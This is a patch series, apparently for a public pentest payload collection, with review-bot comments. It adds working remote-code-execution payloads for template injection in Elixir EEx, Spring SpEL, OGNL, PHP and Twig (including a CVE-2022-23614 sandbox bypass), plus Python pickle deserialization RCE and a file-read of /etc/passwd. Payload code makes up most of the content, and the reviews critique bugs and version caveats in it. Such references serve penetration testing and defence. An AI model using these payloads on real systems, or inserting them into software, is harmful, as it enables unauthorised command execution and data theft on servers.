From dac581547e529db38684e9ae93c5278ab47aa961 Mon Sep 17 00:00:00 2001 From: vladko312 Date: Sun, 22 Feb 2026 21:18:54 +0300 Subject: [PATCH 1/8] SSTI: - Added Elixir/EEx payloads - Added OGNL payloads - Clarified SpEL payloads and details - Fixed PHP Error-Based payloads - Added Twig Error-Based payload for CVE-2022-23614 Insecure Deserialization: - Improved Python payloads --- Insecure Deserialization/Python.md | 25 +++++++++ Server Side Template Injection/Elixir.md | 66 +++++++++++++++++++++++ Server Side Template Injection/Java.md | 67 +++++++++++++++++++++++- Server Side Template Injection/PHP.md | 6 +-- 4 files changed, 160 insertions(+), 4 deletions(-) create mode 100644 Server Side Template Injection/Elixir.md diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index 5071e80488..b29ad2c499 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md 
@@ -68,6 +68,30 @@ evil_token = b64encode(cPickle.dumps(e)) print("Your Evil Token : {}").format(evil_token) ``` +This payload uses platform-specific `os` module, so payloads generated on Windows will not work on Linux and vice versa. + +A universal payload can be created by loading `os` at runtime using eval: + +```python +import pickle +import base64 + +class RCE: + def __reduce__(self): + return eval, ("__import__('os').system('whoami')",) +pickled = pickle.dumps(RCE()) +print(base64.b64encode(pickled).decode()) +``` + +This approach allows running arbitrary python code, which allows us to use different techniques from code injection: + +```python +__import__('os').system('whoami') # Reflected RCE +getattr('', __import__('os').popen('whoami').read()) # Error-Based RCE +1 / (__include__("os").popen("id")._proc.wait() == 0) # Boolean-Based RCE +__include__("os").popen("id && sleep 5").read() # Time-Based RCE +``` + ### PyYAML YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures. @@ -111,3 +135,4 @@ with open('exploit_unsafeloader.yml') as file: * [Python Yaml Deserialization - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization) * [PyYAML Documentation - PyYAML - April 29, 2006](https://pyyaml.org/wiki/PyYAMLDocumentation) * [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf) +* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) 
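Review bot: the Boolean-Based and Time-Based lines of the new code-injection list call `__include__("os")`, which is not a Python builtin; both should read `__import__("os")` like the two lines above them, otherwise the payload dies with `NameError` before any command runs. In the same block, `os.popen("id")._proc.wait()` reaches into the private `_wrap_close._proc` attribute; it works on current CPython but is undocumented, so either say so or use `__import__("subprocess").call(["id"])` for the exit status. The sentence introducing the `eval` variant would also benefit from one clause on why it is universal: the reduce target is `builtins.eval`, so the pickle carries no `posix`/`nt` reference and the `os` import happens on the victim.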
diff --git a/Server Side Template Injection/Elixir.md b/Server Side Template Injection/Elixir.md new file mode 100644 index 0000000000..cfe8cda1b9 --- /dev/null +++ b/Server Side Template Injection/Elixir.md 
@@ -0,0 +1,66 @@ +# Server Side Template Injection - Elixir + +> Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation. + +## Summary + +- [Templating Libraries](#templating-libraries) +- [Universal Payloads](#universal-payloads) +- [EEx](#eex) + - [EEx - Basic injections](#eex---basic-injections) + - [EEx - Retrieve /etc/passwd](#eex---retrieve-etcpasswd) + - [EEx - Remote Command execution](#eex---remote-command-execution) +- [References](#references) + +## Templating Libraries + +| Template Name | Payload Format | +|---------------|----------------| +| EEx | `<%= %>` | +| LEEx | `<%= %>` | +| HEEx | `<%= %>` | + +## Universal Payloads + +Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx. + +By default, only EEx can render templates from string, but it is possible to use LEEx and HEEx as replacement engines for EEx. + +To use these payloads, wrap them in the appropriate tag. + +```erlang +elem(System.shell("id"), 0) # Rendered RCE +[1, 2][elem(System.shell("id"), 0)] # Error-Based RCE +1/((elem(System.shell("id"), 1) == 0)&&1||0) # Boolean-Based RCE +elem(System.shell("id && sleep 5"), 0) # Time-Based RCE +``` + +## EEx + +[Official website](https://hexdocs.pm/eex/1.19.5/EEx.html) +> EEx stands for Embedded Elixir. 
+ +### EEx - Basic injections + +```erlang +<%= 7 * 7 %> +``` + +### EEx - Retrieve /etc/passwd + +```erlang +<%= File.read!("/etc/passwd") %> +``` + +### EEx - Remote Command execution + +```erlang +<%= elem(System.shell("id"), 0) %> # Rendered RCE +<%= [1, 2][elem(System.shell("id"), 0)] %> # Error-Based RCE +<%= 1/((elem(System.shell("id"), 1) == 0)&&1||0) %> # Boolean-Based RCE +<%= elem(System.shell("id && sleep 5"), 0) %> # Time-Based RCE +``` + +## References + +- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index f261d791d2..90c54ffdf6 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -35,6 +35,9 @@ - [SpEL - DNS Exfiltration](#spel---dns-exfiltration) - [SpEL - Session Attributes](#spel---session-attributes) - [SpEL - Command Execution](#spel---command-execution) +- [Object-Graph Navigation Language](#object-graph-navigation-language) + - [OGNL - Basic Injection](#ognl---basic-injection) + - [OGNL - Command Execution](#ognl---command-execution) - [References](#references) ## Templating Libraries @@ -46,7 +49,7 @@ | Groovy | `${ }` | | Jinjava | `{{ }}` | | Pebble | `{{ }}` | -| Spring | `*{ }` | +| SpEL | `*{ }`, `#{ }`, `${ }` | | Thymeleaf | `[[ ]]` | | Velocity | `#set($X="") $X` | @@ -367,9 +370,12 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ### SpEL - Basic Injection +> SpEL has built-in templating system using #{ }, but SpEL is also commonly used for interpolation using ${ } + ```java ${7*7} ${'patt'.toString().replace('a', 'x')} +${T(java.lang.Integer).valueOf('1')} ``` ### SpEL - Retrieve Environment Variables 
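Review bot: the fences in the new Elixir.md are tagged `erlang` although the content is Elixir (`System.shell/1`, `elem/2`, `File.read!/1`); tag them `elixir` so highlighting and the markdown linter treat them correctly. `System.shell/1` only exists from Elixir 1.12, so a version note next to the payloads would save readers on older releases a confusing `UndefinedFunctionError`. In the EEx - Remote Command execution block the `# Rendered RCE` style comments sit outside `<%= %>`, so a copied line would emit them as literal template text; keep the labels in the Universal Payloads block or move them to prose.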
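Review bot: the renamed table row `| SpEL | *{ }, #{ }, ${ } |` mixes the expression language with the delimiters of engines that embed it. `#{ }` is SpEL's own template prefix (Spring's `TemplateParserContext`), whereas `*{ }` and `${ }` are Thymeleaf's selection and variable expressions, which are evaluated as SpEL only in Spring-integrated Thymeleaf. Suggest keeping a `Spring`/Thymeleaf row and stating which integration each delimiter belongs to, so the row does not read as if SpEL itself parsed `*{ }`.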
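Review bot: the new quote under SpEL - Basic Injection, "SpEL is also commonly used for interpolation using ${ }", is misleading as written: in plain Spring `${ }` is a property placeholder, not an expression, and it only becomes a SpEL evaluation context inside Thymeleaf (or a similar integration). Name that context, or readers will try `${7*7}` against `@Value` placeholders and conclude the target is not vulnerable. The added `${T(java.lang.Integer).valueOf('1')}` probe is a good addition since it distinguishes SpEL from other `${ }` languages.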
@@ -440,6 +446,65 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.getAttribute("a")} ``` +- Error-Based payload: + + ```java + ${T(java.lang.Integer).valueOf("x"+T(java.lang.String).getConstructor(T(byte[])).newInstance(T(java.lang.Runtime).getRuntime().exec("id").inputStream.readAllBytes()))} + ``` + +- Boolean-Based payload: + + ```java + ${1/((T(java.lang.Runtime).getRuntime().exec("id").waitFor()==0)?1:0)+""} + ``` + +- Time-Based payload: + + ```java + ${(T(java.lang.Runtime).getRuntime().exec("id").waitFor().equals(0)?T(java.lang.Thread).sleep(5000):0).toString()} + ``` + +## Object-Graph Navigation Language + +[Official website](https://commons.apache.org/dormant/commons-ognl/) + +> OGNL stands for Object-Graph Navigation Language; it is an expression language for getting and setting properties of Java objects, plus other extras such as list projection and selection and lambda expressions. You use the same expression for both getting and setting the value of a property. + +### OGNL - Basic Injection + +> OGNL can be used with different tags like ${ } + +```java +7*7 +'patt'.toString().replace('a', 'x') +@java.lang.Integer@valueOf('1') +``` + +### OGNL - Command Execution + +Rendered: + +```java +new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes()) +``` + +Error-Based: + +```java +(new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes()))/0 +``` + +Boolean-Based: + +```java +1/((@java.lang.Runtime@getRuntime().exec("id").waitFor()==0)?1:0)+"" +``` + +Time-Based: + +```java +((@java.lang.Runtime@getRuntime().exec("id").waitFor().equals(0))?@java.lang.Thread@sleep(5000):0) +``` ## References diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 11caee80a3..97be31cd6c 100644 
--- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -47,9 +47,7 @@ system('id') // Error-Based RCE ini_set("error_reporting", "1") // Enable verbose fatal errors for Error-Based -fopen(join("", ["Y:/A:/", shell_exec('id')]), "r") -include(join("", ["Y:/A:/", shell_exec('id')])) -join("", ["xx", shell_exec('id')])() +call_user_func(join("", ["xx", shell_exec('id')])) // Boolean-Based RCE 1 / (pclose(popen("id", "wb")) == 0) @@ -163,6 +161,8 @@ $output = $twig > render ( {{_self.env.registerUndefinedFilterCallback("shell_exec")}}{{1/(_self.env.getFilter("id && echo UniqueString")|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE <= 1.19 {{1/({"id && echo UniqueString":"shell_exec"}|map("call_user_func")|join|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE >=1.41, >=2.10, >=3.0 + +{% set a = ["error_reporting", "1"]|sort("ini_set") %}{% set b = ["ob_start", "call_user_func"]|sort("call_user_func") %}{{ ["id", 0]|sort("system") }}{% set a = ["ob_end_flush", []]|sort("call_user_func_array")%} // Error-Based RCE with sandbox bypass using CVE-2022-23614 {{ 1 / (["id >>/dev/null && echo -n 1", "0"]|sort("system")|first == "0") }} // Boolean-Based RCE with sandbox bypass using CVE-2022-23614 ``` From f99fe06c2f0758668b1a98ae157dd2dc53f362f5 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:45:36 +0100 Subject: [PATCH 2/8] Update Python.md to clarify payload compatibility Removed note about platform-specific payloads and added information on creating a universal payload using eval. --- Insecure Deserialization/Python.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index b29ad2c499..e358bcc1d9 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md 
@@ -68,8 +68,6 @@ evil_token = b64encode(cPickle.dumps(e)) print("Your Evil Token : {}").format(evil_token) ``` -This payload uses platform-specific `os` module, so payloads generated on Windows will not work on Linux and vice versa. - A universal payload can be created by loading `os` at runtime using eval: ```python From 5c487edc055a315a3792459d57b1dc952a015c9c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:52:24 +0100 Subject: [PATCH 3/8] Change title to 'Elixir Deserialization' and update content Updated the title and provided a brief overview of Server-Side Template Injection in Elixir. --- Server Side Template Injection/Elixir.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/Elixir.md b/Server Side Template Injection/Elixir.md index cfe8cda1b9..4fc469f959 100644 --- a/Server Side Template Injection/Elixir.md +++ b/Server Side Template Injection/Elixir.md @@ -1,4 +1,4 @@ -# Server Side Template Injection - Elixir +# Elixir Deserialization > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation. From 3c063a8616d97e4a6e99797f47cc397bf04a656e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:57:38 +0100 Subject: [PATCH 4/8] Fix formatting for SpEL and OGNL examples in Java.md --- Server Side Template Injection/Java.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 90c54ffdf6..45dc1861c2 100644 --- a/Server Side Template Injection/Java.md 
+++ b/Server Side Template Injection/Java.md @@ -370,7 +370,7 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ### SpEL - Basic Injection -> SpEL has built-in templating system using #{ }, but SpEL is also commonly used for interpolation using ${ } +> SpEL has built-in templating system using `#{ }`, but SpEL is also commonly used for interpolation using `${ }``. ```java ${7*7} @@ -472,7 +472,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ### OGNL - Basic Injection -> OGNL can be used with different tags like ${ } +> OGNL can be used with different tags like `${ }` ```java 7*7 From 3051fc81158e2b33bf22a7335f1971f10f48f561 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:58:19 +0100 Subject: [PATCH 5/8] Fix formatting issues in SpEL section of Java.md --- Server Side Template Injection/Java.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 45dc1861c2..84981a8058 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -370,7 +370,7 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ### SpEL - Basic Injection -> SpEL has built-in templating system using `#{ }`, but SpEL is also commonly used for interpolation using `${ }``. +> SpEL has built-in templating system using `#{ }`, but SpEL is also commonly used for interpolation using `${ }`. ```java ${7*7} From b60551efe9673b9d493b1a73e97fe08e0ddb68ee Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 18:04:20 +0100 Subject: [PATCH 6/8] Fix CI/CD markdown --- Server Side Template Injection/Java.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 84981a8058..397ee996b8 100644 
--- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -446,6 +446,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.getAttribute("a")} ``` + - Error-Based payload: ```java From ae9c45f47425522459d4b0902373132d781dae21 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 18:07:33 +0100 Subject: [PATCH 7/8] Fix markdown linter --- Server Side Request Forgery/README.md | 4 ++-- Server Side Template Injection/Java.md | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 091de3b4ee..34a6bd9ed5 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -271,12 +271,12 @@ http:127.0.0.1/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) -Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/` +Parsing behavior by different libraries: `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`. * `urllib2` treats `1.1.1.1` as the destination * `requests` and browsers redirect to `2.2.2.2` * `urllib` resolves to `3.3.3.3` -* Some parsers replace http:127.0.0.1/ to http://127.0.0.1/ +* Some parsers replace `http:127.0.0.1/` to `http://127.0.0.1/` ### Bypass PHP filter_var() Function diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 397ee996b8..4f6d898b52 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md 
@@ -446,7 +446,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)} ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} ${request.getAttribute("a")} ``` - + - Error-Based payload: ```java From d8e749cdc5eee963869fb660275e75474cb8a728 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Mar 2026 18:23:58 +0100 Subject: [PATCH 8/8] Fix title error --- Server Side Template Injection/Elixir.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Server Side Template Injection/Elixir.md b/Server Side Template Injection/Elixir.md index 4fc469f959..cfe8cda1b9 100644 --- a/Server Side Template Injection/Elixir.md +++ b/Server Side Template Injection/Elixir.md @@ -1,4 +1,4 @@ -# Elixir Deserialization +# Server Side Template Injection - Elixir > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation.
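Review bot: the SpEL and OGNL command-execution hunk relies on `inputStream.readAllBytes()` / `getInputStream().readAllBytes()`, which exists only on Java 9 and later; add a version caveat beside these payloads, since Java 8 targets are still common and the failure looks like a method-resolution error rather than a non-vulnerable target. In the OGNL section the "Official website" link points at the dormant Apache Commons port (the URL path itself says `dormant`), and the quote "OGNL can be used with different tags like `${ }`" does not say which framework supplies the tag; point at the maintained OGNL project and name the tag's origin.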
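Review bot: in the PHP.md hunk replacing the three error-based lines with `call_user_func(join("", ["xx", shell_exec('id')]))`, the replacement only produces a thrown `TypeError` on PHP 8; on PHP 7 an invalid callback is an `E_WARNING`, which the `ini_set("error_reporting", "1")` line directly above (E_ERROR only) suppresses. The removed `join("", ["xx", shell_exec('id')])()` variant raised "Call to undefined function" as a fatal `Error` on both majors, so either keep it alongside the new line or mark the new one as PHP 8+.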
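Review bot: the new Twig CVE-2022-23614 Error-Based line binds `a` twice (`{% set a = ["error_reporting", "1"]|sort("ini_set") %}` and again for `ob_end_flush`); the reassignment is harmless but reads like a copy-paste slip, so rename the second binding or drop it. The leak mechanism is also not obvious from the payload alone: `sort("call_user_func")` installs `call_user_func` as the output-buffer handler via `ob_start`, `sort("system")` writes the `id` output into that buffer, and `ob_end_flush` then passes the output to `call_user_func` as a callback name, whose `TypeError` echoes it back. A one-line comment describing that chain, plus the same PHP 8 caveat as for the plain `call_user_func` payload, would make the line usable rather than magic.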
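Review bot: PATCH 2/8 deletes the sentence "This payload uses platform-specific `os` module, so payloads generated on Windows will not work on Linux and vice versa", which leaves the following "A universal payload can be created ..." with nothing to be universal relative to. The deleted sentence was accurate: `pickle.dumps(os.system)` records the function's defining module, `posix` on Linux and `nt` on Windows, so the first payload is OS-bound while the `eval`-based one is not. Keep one sentence to that effect instead of removing the explanation.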
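Review bot: PATCH 8/8 reverts PATCH 3/8 line for line (`# Elixir Deserialization` back to `# Server Side Template Injection - Elixir`), PATCH 5/8 only removes the stray second backtick that PATCH 4/8 introduced in `` `${ }`` ``, and PATCHES 6/8 and 7/8 add and then strip whitespace around the same `- Error-Based payload:` bullet in Java.md. Squash these into the commits they fix before merging so the history does not carry a title that was never right for an SSTI page. In the SSRF README hunk of PATCH 7/8, "replace `http:127.0.0.1/` to `http://127.0.0.1/`" should read "with", since that line is being touched anyway.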